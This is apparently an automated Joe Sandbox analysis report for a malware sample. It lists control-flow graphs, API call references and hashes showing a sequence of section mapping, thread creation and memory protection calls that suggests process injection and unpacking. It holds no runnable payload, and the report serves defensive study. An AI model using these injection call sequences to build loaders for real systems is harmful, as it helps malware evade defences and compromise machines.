                                        control_flow_graph 291 401549-40156e call 401193 295 401570 291->295 296 401573-401578 291->296 295->296 298 401898-4018a0 296->298 299 40157e-40158f 296->299 298->296 304 4018a5-4018b7 298->304 302 401595-4015be 299->302 303 401896 299->303 302->303 313 4015c4-4015db NtDuplicateObject 302->313 303->304 309 4018c5 304->309 310 4018bc-4018e3 call 401193 304->310 309->310 313->303 315 4015e1-401605 NtCreateSection 313->315 317 401661-401687 NtCreateSection 315->317 318 401607-401628 NtMapViewOfSection 315->318 317->303 319 40168d-401691 317->319 318->317 321 40162a-401646 NtMapViewOfSection 318->321 319->303 322 401697-4016b8 NtMapViewOfSection 319->322 321->317 324 401648-40165e 321->324 322->303 325 4016be-4016da NtMapViewOfSection 322->325 324->317 325->303 328 4016e0 call 4016e5 325->328
                                        APIs
                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1930067416.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_K80v6DHFHE.jbxd
                                        Similarity
                                        • API ID: Section$View$Create$DuplicateObject
                                        • String ID:
                                        • API String ID: 1546783058-0
                                        • Opcode ID: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
                                        • Instruction ID: 7a8a064d68380c64131d995910f5c092f0e660b32494b1024d3e535184c76cf3
                                        • Opcode Fuzzy Hash: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
                                        • Instruction Fuzzy Hash: 78510875900249BFEF209F91CC48FAFBBB8FF86B10F144159F911AA2A5E6709940CB24

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 330 401557 331 40155b-40156e call 401193 330->331 332 40154f-401554 330->332 335 401570 331->335 336 401573-401578 331->336 332->331 335->336 338 401898-4018a0 336->338 339 40157e-40158f 336->339 338->336 344 4018a5-4018b7 338->344 342 401595-4015be 339->342 343 401896 339->343 342->343 353 4015c4-4015db NtDuplicateObject 342->353 343->344 349 4018c5 344->349 350 4018bc-4018e3 call 401193 344->350 349->350 353->343 355 4015e1-401605 NtCreateSection 353->355 357 401661-401687 NtCreateSection 355->357 358 401607-401628 NtMapViewOfSection 355->358 357->343 359 40168d-401691 357->359 358->357 361 40162a-401646 NtMapViewOfSection 358->361 359->343 362 401697-4016b8 NtMapViewOfSection 359->362 361->357 364 401648-40165e 361->364 362->343 365 4016be-4016da NtMapViewOfSection 362->365 364->357 365->343 368 4016e0 call 4016e5 365->368
                                        APIs
                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1930067416.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_K80v6DHFHE.jbxd
                                        Similarity
                                        • API ID: Section$View$Create$DuplicateObject
                                        • String ID:
                                        • API String ID: 1546783058-0
                                        • Opcode ID: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
                                        • Instruction ID: 25abb30e6883f9026caabbb74ebb32c420b3dbd3b7f631cb87a4d5ab1caa8f11
                                        • Opcode Fuzzy Hash: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
                                        • Instruction Fuzzy Hash: C75118B5900209BFEF209F91CC48FAFBBB8FF85B10F144169F911BA2A5D6709940CB24

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 399 402f97-402fbb 400 402fc1-402fd9 399->400 401 4030ee-4030f3 399->401 400->401 402 402fdf-402ff0 400->402 403 402ff2-402ffb 402->403 404 403000-40300e 403->404 404->404 405 403010-403017 404->405 406 403039-403040 405->406 407 403019-403038 405->407 408 403062-403065 406->408 409 403042-403061 406->409 407->406 410 403067-40306a 408->410 411 40306e 408->411 409->408 410->411 412 40306c 410->412 411->403 413 403070-403075 411->413 412->413 413->401 414 403077-40307a 413->414 414->401 415 40307c-4030eb RtlCreateUserThread NtTerminateProcess 414->415 415->401
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1930067416.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_K80v6DHFHE.jbxd
                                        Similarity
                                        • API ID: CreateProcessTerminateThreadUser
                                        • String ID:
                                        • API String ID: 1921587553-0
                                        • Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                        • Instruction ID: 1591ba869369ea84e79847af2efd18b9bf5795e6c00b1d775a4c0b4e714efbc4
                                        • Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                        • Instruction Fuzzy Hash: FD414531218E0C4FD7A8EF6CA88576277D5F798311F6643AAE809D3389EA74DC1183C5

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 416 2b8016d-2b80186 417 2b80188-2b8018a 416->417 418 2b8018c 417->418 419 2b80191-2b8019d CreateToolhelp32Snapshot 417->419 418->419 420 2b801ad-2b801ba Module32First 419->420 421 2b8019f-2b801a5 419->421 422 2b801bc-2b801bd call 2b7fe2c 420->422 423 2b801c3-2b801cb 420->423 421->420 427 2b801a7-2b801ab 421->427 428 2b801c2 422->428 427->417 427->420 428->423
                                        APIs
                                        • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02B80195
                                        • Module32First.KERNEL32(00000000,00000224), ref: 02B801B5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1931909855.0000000002B7D000.00000040.00000020.00020000.00000000.sdmp, Offset: 02B7D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b7d000_K80v6DHFHE.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CreateFirstModule32SnapshotToolhelp32
                                        • String ID:
                                        • API String ID: 3833638111-0
                                        • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                        • Instruction ID: bf4a9e3657ffdaeef2899488f72de691baf1c3ad4d31ed63f11059f7dd263577
                                        • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                        • Instruction Fuzzy Hash: 2EF09C351007106FD7203BF5988DB7F76E9EF496B4F100968F55BD14C0D770E9898661

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 68 2c7003c-2c70047 69 2c7004c-2c70263 call 2c70a3f call 2c70e0f call 2c70d90 VirtualAlloc 68->69 70 2c70049 68->70 85 2c70265-2c70289 call 2c70a69 69->85 86 2c7028b-2c70292 69->86 70->69 91 2c702ce-2c703c2 VirtualProtect call 2c70cce call 2c70ce7 85->91 88 2c702a1-2c702b0 86->88 90 2c702b2-2c702cc 88->90 88->91 90->88 97 2c703d1-2c703e0 91->97 98 2c703e2-2c70437 call 2c70ce7 97->98 99 2c70439-2c704b8 VirtualFree 97->99 98->97 101 2c705f4-2c705fe 99->101 102 2c704be-2c704cd 99->102 105 2c70604-2c7060d 101->105 106 2c7077f-2c70789 101->106 104 2c704d3-2c704dd 102->104 104->101 108 2c704e3-2c70505 104->108 105->106 111 2c70613-2c70637 105->111 109 2c707a6-2c707b0 106->109 110 2c7078b-2c707a3 106->110 120 2c70517-2c70520 108->120 121 2c70507-2c70515 108->121 112 2c707b6-2c707cb 109->112 113 2c7086e-2c708be LoadLibraryA 109->113 110->109 114 2c7063e-2c70648 111->114 116 2c707d2-2c707d5 112->116 119 2c708c7-2c708f9 113->119 114->106 117 2c7064e-2c7065a 114->117 122 2c707d7-2c707e0 116->122 123 2c70824-2c70833 116->123 117->106 118 2c70660-2c7066a 117->118 124 2c7067a-2c70689 118->124 126 2c70902-2c7091d 119->126 127 2c708fb-2c70901 119->127 128 2c70526-2c70547 120->128 121->128 129 2c707e4-2c70822 122->129 130 2c707e2 122->130 125 2c70839-2c7083c 123->125 131 2c70750-2c7077a 124->131 132 2c7068f-2c706b2 124->132 125->113 133 2c7083e-2c70847 125->133 127->126 134 2c7054d-2c70550 128->134 129->116 130->123 131->114 137 2c706b4-2c706ed 132->137 138 2c706ef-2c706fc 132->138 139 2c7084b-2c7086c 133->139 140 2c70849 133->140 135 2c70556-2c7056b 134->135 136 2c705e0-2c705ef 134->136 142 2c7056f-2c7057a 135->142 143 2c7056d 135->143 136->104 137->138 144 2c706fe-2c70748 138->144 145 2c7074b 138->145 139->125 140->113 146 2c7057c-2c70599 142->146 147 2c7059b-2c705bb 142->147 143->136 144->145 145->124 152 2c705bd-2c705db 146->152 147->152 152->134
                                        APIs
                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 02C7024D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1931965782.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2c70000_K80v6DHFHE.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID: cess$kernel32.dll
                                        • API String ID: 4275171209-1230238691
                                        • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                        • Instruction ID: 2578528d95e296f0f130f97727f7e8a4b4dd266050c786927ed7d4256d07e6d4
                                        • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                        • Instruction Fuzzy Hash: 97526975A01229DFDB64CF68C985BACBBB1BF09304F1480D9E94DAB351DB30AA85DF14

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 370 415867-41586e 371 415870-415880 370->371 372 415882 371->372 373 415888-41588b 371->373 372->373 373->371 374 41588d-4158ae LoadLibraryA call 4151b0 call 4154a0 373->374 379 4158b0-4158b7 374->379 380 4158c3-4158c9 379->380 381 4158b9-4158bf 379->381 382 4158d0-4158d7 380->382 383 4158cb call 4151a0 380->383 381->380 386 4158e6-4158ed 382->386 387 4158d9-4158e0 InterlockedDecrement 382->387 383->382 386->379 388 4158ef-4158ff 386->388 387->386 389 415900-415910 388->389 390 415912 389->390 391 415919-41591c 389->391 390->391 391->389 392 41591e-415929 391->392 393 415930-415935 392->393 394 415937-41593d 393->394 395 41593f-415945 393->395 394->395 396 415947-415954 394->396 395->393 395->396
                                        APIs
                                        • LoadLibraryA.KERNELBASE(004173F4), ref: 00415892
                                        • InterlockedDecrement.KERNEL32(?), ref: 004158E0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1930240795.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_40b000_K80v6DHFHE.jbxd
                                        Similarity
                                        • API ID: DecrementInterlockedLibraryLoad
                                        • String ID: k`$}$
                                        • API String ID: 1728580480-956986773
                                        • Opcode ID: a020aaf6d7ef5e2bfd4c9a9f54f779ecec6b35c3b295fac4a587e97a552db2d4
                                        • Instruction ID: 273e988762e02699ff252dc655ae774bf30313f900aa46e77cba19cfb1f4ca4e
                                        • Opcode Fuzzy Hash: a020aaf6d7ef5e2bfd4c9a9f54f779ecec6b35c3b295fac4a587e97a552db2d4
                                        • Instruction Fuzzy Hash: 71113670D41A10CBDB20EB6099857DABB64FBC8365F92043BD94997251CA3C88E18B99

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 398 4151b0-4152f0 GetModuleHandleW GetProcAddress VirtualProtect
                                        APIs
                                        • GetModuleHandleW.KERNEL32(02B18CE8), ref: 0041528F
                                        • GetProcAddress.KERNEL32(00000000,0041ACD0), ref: 004152CC
                                        • VirtualProtect.KERNELBASE(02B18B2C,02B18CE4,00000040,?), ref: 004152EB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1930240795.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_40b000_K80v6DHFHE.jbxd
                                        Similarity
                                        • API ID: AddressHandleModuleProcProtectVirtual
                                        • String ID:
                                        • API String ID: 2099061454-3916222277
                                        • Opcode ID: 05a0996e96e2e6dea05aedbe29179f43af643523e767b93736c198f8bfabdd5c
                                        • Instruction ID: 6a590a8926acfa3c7df48d762a2d30e232421f7677ab7ce89d68225f10d6884e
                                        • Opcode Fuzzy Hash: 05a0996e96e2e6dea05aedbe29179f43af643523e767b93736c198f8bfabdd5c
                                        • Instruction Fuzzy Hash: DE311C20A5B680CBF301CB78F8047923E62BB25744F44847895498B3A5EBBA5534E7EF

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 429 2c70e0f-2c70e24 SetErrorMode * 2 430 2c70e26 429->430 431 2c70e2b-2c70e2c 429->431 430->431
                                        APIs
                                        • SetErrorMode.KERNELBASE(00000400,?,?,02C70223,?,?), ref: 02C70E19
                                        • SetErrorMode.KERNELBASE(00000000,?,?,02C70223,?,?), ref: 02C70E1E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1931965782.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2c70000_K80v6DHFHE.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorMode
                                        • String ID:
                                        • API String ID: 2340568224-0
                                        • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                        • Instruction ID: 25ef51fef4db5f7ec44bd9215f2815ef669215441d4b8e203029a7bdcddcdc72
                                        • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                        • Instruction Fuzzy Hash: 05D01232245228B7DB002A94DC09BCEBB1CDF09BA6F008021FB0DE9080CBB09A4047EA

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 432 4018e6-40194b call 401193 Sleep call 40141f 446 40195a-4019a5 call 401193 432->446 447 40194d-401955 call 401514 432->447 447->446
                                        APIs
                                        • Sleep.KERNELBASE(00001388), ref: 00401936
                                          • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                          • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                          • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1930067416.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_K80v6DHFHE.jbxd
                                        Similarity
                                        • API ID: Section$CreateDuplicateObjectSleepView
                                        • String ID:
                                        • API String ID: 1885482327-0
                                        • Opcode ID: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
                                        • Instruction ID: 08a90aa29aaa59261053d8f0d19a3ecdc4dd21bf61fce8c4d66a51d0c793aa75
                                        • Opcode Fuzzy Hash: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
                                        • Instruction Fuzzy Hash: EB11A1F660C204FAEB106AA49C61E7A3318AB40754F304137F613790F5957D9A13F66F

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 461 401915-401918 462 4018c6-4018c7 461->462 463 40191a-40194b call 401193 Sleep call 40141f 461->463 465 4018d7 462->465 466 4018ce-4018e3 call 401193 462->466 475 40195a-4019a5 call 401193 463->475 476 40194d-401955 call 401514 463->476 465->466 476->475
                                        APIs
                                        • Sleep.KERNELBASE(00001388), ref: 00401936
                                          • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                          • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                          • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1930067416.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_K80v6DHFHE.jbxd
                                        Similarity
                                        • API ID: Section$CreateDuplicateObjectSleepView
                                        • String ID:
                                        • API String ID: 1885482327-0
                                        • Opcode ID: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
                                        • Instruction ID: d2c64d108ecd7190b789ce3c9d4f03e3911909dfd4099b6475a4add21270c3a3
                                        • Opcode Fuzzy Hash: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
                                        • Instruction Fuzzy Hash: 6D019EB7208208E6DB006AA5AC51ABA33189B44359F304537F723790F6D57D8612E72F

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 490 4018f1-40194b call 401193 Sleep call 40141f 500 40195a-4019a5 call 401193 490->500 501 40194d-401955 call 401514 490->501 501->500
                                        APIs
                                        • Sleep.KERNELBASE(00001388), ref: 00401936
                                          • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                          • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                          • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1930067416.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_K80v6DHFHE.jbxd
                                        Similarity
                                        • API ID: Section$CreateDuplicateObjectSleepView
                                        • String ID:
                                        • API String ID: 1885482327-0
                                        • Opcode ID: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
                                        • Instruction ID: b5ca90d31d4069b8fd1e735589466699ca1bb5e14181e618ca72d4e2f39bbf06
                                        • Opcode Fuzzy Hash: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
                                        • Instruction Fuzzy Hash: D101D2B6608204EBDB019AF49C62A7A37549F44315F200137FA53790F1D67D8643E72F
                                        APIs
                                        • Sleep.KERNELBASE(00001388), ref: 00401936
                                          • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                          • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                          • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1930067416.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_K80v6DHFHE.jbxd
                                        Similarity
                                        • API ID: Section$CreateDuplicateObjectSleepView
                                        • String ID:
                                        • API String ID: 1885482327-0
                                        • Opcode ID: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
                                        • Instruction ID: 0621b20c29367ada74e4c9127c9a5516285bec5e68af8f441e6b7f153e3f788d
                                        • Opcode Fuzzy Hash: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
                                        • Instruction Fuzzy Hash: 11017CB560C204EAEB109AA49C61A7A3318AB44354F304537FA27790F5D67D9612E72F
                                        APIs
                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02B7FE7D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1931909855.0000000002B7D000.00000040.00000020.00020000.00000000.sdmp, Offset: 02B7D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b7d000_K80v6DHFHE.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                        • Instruction ID: 4329d4c01c2d71f75f2e619dfa01673e64e287d2975cfd3a19e02b704abd0065
                                        • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                        • Instruction Fuzzy Hash: AA113979A00208EFDB01DF98C985E99BBF5EF08350F0580A4F9489B362D371EA90DF80
                                        APIs
                                        • Sleep.KERNELBASE(00001388), ref: 00401936
                                          • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                          • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                          • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1930067416.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_K80v6DHFHE.jbxd
                                        Similarity
                                        • API ID: Section$CreateDuplicateObjectSleepView
                                        • String ID:
                                        • API String ID: 1885482327-0
                                        • Opcode ID: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
                                        • Instruction ID: ea6e3854d66af35421fcd7571e0742f45a6e64d38424a4e1b6315f5079e28d0a
                                        • Opcode Fuzzy Hash: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
                                        • Instruction Fuzzy Hash: 28F08CB6208204EADB00AEA49C61EBA3318AB44314F304533FB23790F5C67D8612E72F
                                        APIs
                                        • LocalAlloc.KERNELBASE(00000000,02B18CE4,00415848), ref: 00415188
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1930240795.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_40b000_K80v6DHFHE.jbxd
                                        Similarity
                                        • API ID: AllocLocal
                                        • String ID:
                                        • API String ID: 3494564517-0
                                        • Opcode ID: 697e3b3ef190b299ffb728806ee3e68314d7429f88aebd263d7b879482847904
                                        • Instruction ID: f865e6b2e3803cbb86dad00ce2678956489d20d1f66e016f0fea3cba8c339ba6
                                        • Opcode Fuzzy Hash: 697e3b3ef190b299ffb728806ee3e68314d7429f88aebd263d7b879482847904
                                        • Instruction Fuzzy Hash: 79B092B09822009BE2408FB0A844B513A65B308342F414821F60886280CA2164208F14
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1931965782.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2c70000_K80v6DHFHE.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: .$GetProcAddress.$l
                                        • API String ID: 0-2784972518
                                        • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                        • Instruction ID: 9e1734403a4ada61a9505d76245ba2f0029b62354f8ae7908a5a5dfa82fbdc57
                                        • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                        • Instruction Fuzzy Hash: E03139B6910609DFDB10CF99C884AAEBBF9FF58324F15404AD841A7350D771EA45CFA4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1931909855.0000000002B7D000.00000040.00000020.00020000.00000000.sdmp, Offset: 02B7D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b7d000_K80v6DHFHE.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                        • Instruction ID: 130b24a85bfeabe303821a8c55d994a8b7875f57190af622a8dccb1956b77569
                                        • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                        • Instruction Fuzzy Hash: 281182723402009FD744DF55DC80FA673EAEB89360B1980A5ED24CB761D775E801CB60
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1930067416.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_K80v6DHFHE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d637f55854845c17b2ef1889abfa65daee778aef84c81fe99ca145d77efb4ab1
                                        • Instruction ID: 8df8bbe6331efc2743c071309605838865bd09ee4bc9229f5037613db63a7100
                                        • Opcode Fuzzy Hash: d637f55854845c17b2ef1889abfa65daee778aef84c81fe99ca145d77efb4ab1
                                        • Instruction Fuzzy Hash: 3CF0F0A1E2E243AFCA0A1E34A916532AF1C751632372401FFA083752C2E23D0B17619F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1931965782.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2c70000_K80v6DHFHE.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                        • Instruction ID: 08bd649448e95a8ddea2dbac74536dd2175c56ddeb5a163a840c0bc8e94f64e1
                                        • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                        • Instruction Fuzzy Hash: 6E01D676A106048FDF21CF64C905BAA33F5FBC6316F5544B5D90AD7281E774A941CB90
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1930067416.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_K80v6DHFHE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2e697f2bdb2541e438c090e00759e651186a60c26cca26bbac42aeca89057f02
                                        • Instruction ID: 9241026e722b7dd7cbe781a55eac82938fa1721c21c2f19ebd5655df2a8ce19b
                                        • Opcode Fuzzy Hash: 2e697f2bdb2541e438c090e00759e651186a60c26cca26bbac42aeca89057f02
                                        • Instruction Fuzzy Hash: 90F024A191E281DBCA0E1E2858169327F1C7A5230733405FF9093762C2E13D8B02619F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1930067416.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_K80v6DHFHE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
